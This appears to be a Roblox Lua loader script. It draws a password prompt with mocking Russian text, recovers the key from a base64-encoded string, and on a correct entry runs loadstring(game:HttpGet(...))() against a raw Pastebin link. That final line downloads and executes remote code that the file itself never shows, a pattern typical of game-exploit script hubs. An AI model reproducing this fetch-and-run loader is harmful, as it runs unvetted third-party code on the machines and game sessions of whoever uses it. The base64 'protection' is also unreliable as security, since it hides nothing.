local key = "U3Rhc3lhbjRr"
local player = game:GetService("Players").LocalPlayer
local playerGui = player:WaitForChild("PlayerGui")

local screenGui = Instance.new("ScreenGui")
screenGui.Parent = playerGui

local frame = Instance.new("Frame", screenGui)
frame.Size = UDim2.new(0.3, 0, 0.2, 0)
frame.Position = UDim2.new(0.35, 0, 0.4, 0)
frame.BackgroundColor3 = Color3.fromRGB(50, 50, 50)
frame.BorderSizePixel = 2

local title = Instance.new("TextLabel", frame)
title.Size = UDim2.new(1, 0, 0.3, 0)
title.Position = UDim2.new(0, 0, 0, 0)
title.Text = "Введи код Тёма ;)"
title.TextColor3 = Color3.fromRGB(255, 255, 255)
title.BackgroundTransparency = 1
title.TextScaled = true

local textBox = Instance.new("TextBox", frame)
textBox.Size = UDim2.new(0.8, 0, 0.3, 0)
textBox.Position = UDim2.new(0.1, 0, 0.4, 0)
textBox.PlaceholderText = "ну давай-давай нападай"
textBox.TextScaled = true

local button = Instance.new("TextButton", frame)
button.Size = UDim2.new(0.8, 0, 0.3, 0)
button.Position = UDim2.new(0.1, 0, 0.75, 0)
button.Text = "ну давай"
button.TextScaled = true

local function decodeBase64(base64)
    local b = {
        ['A'] = 0, ['B'] = 1, ['C'] = 2, ['D'] = 3, ['E'] = 4, ['F'] = 5, ['G'] = 6, ['H'] = 7, ['I'] = 8, ['J'] = 9, ['K'] = 10, ['L'] = 11, ['M'] = 12, ['N'] = 13, ['O'] = 14, ['P'] = 15, ['Q'] = 16, ['R'] = 17, ['S'] = 18, ['T'] = 19, ['U'] = 20, ['V'] = 21, ['W'] = 22, ['X'] = 23, ['Y'] = 24, ['Z'] = 25, ['a'] = 26, ['b'] = 27, ['c'] = 28, ['d'] = 29, ['e'] = 30, ['f'] = 31, ['g'] = 32, ['h'] = 33, ['i'] = 34, ['j'] = 35, ['k'] = 36, ['l'] = 37, ['m'] = 38, ['n'] = 39, ['o'] = 40, ['p'] = 41, ['q'] = 42, ['r'] = 43, ['s'] = 44, ['t'] = 45, ['u'] = 46, ['v'] = 47, ['w'] = 48, ['x'] = 49, ['y'] = 50, ['z'] = 51, ['0'] = 52, ['1'] = 53, ['2'] = 54, ['3'] = 55, ['4'] = 56, ['5'] = 57, ['6'] = 58, ['7'] = 59, ['8'] = 60, ['9'] = 61, ['+'] = 62, ['/'] = 63, ['='] = -1
    }

    local decoded = {}
    local bitPattern = 0
    local bits = 0

    for i = 1, #base64 do
        local c = base64:sub(i, i)
        local v = b[c]
        
        if v ~= nil then
            bitPattern = bitPattern * 64 + v
            bits = bits + 6
            
            if bits >= 8 then
                bits = bits - 8
                table.insert(decoded, string.char(math.floor(bitPattern / (2 ^ bits)) % 256))
                bitPattern = bitPattern % (2 ^ bits)
            end
        end
    end

    return table.concat(decoded)
end

local decodedKey = decodeBase64(key)

button.MouseButton1Click:Connect(function()
    if textBox.Text == decodedKey then
        screenGui:Destroy()
        loadstring(game:HttpGet("https://pastebin.com/raw/K03CeTuQ"))()
    else
        textBox.Text = "лох!"
        textBox.TextColor3 = Color3.fromRGB(255, 0, 0)
    end
end)
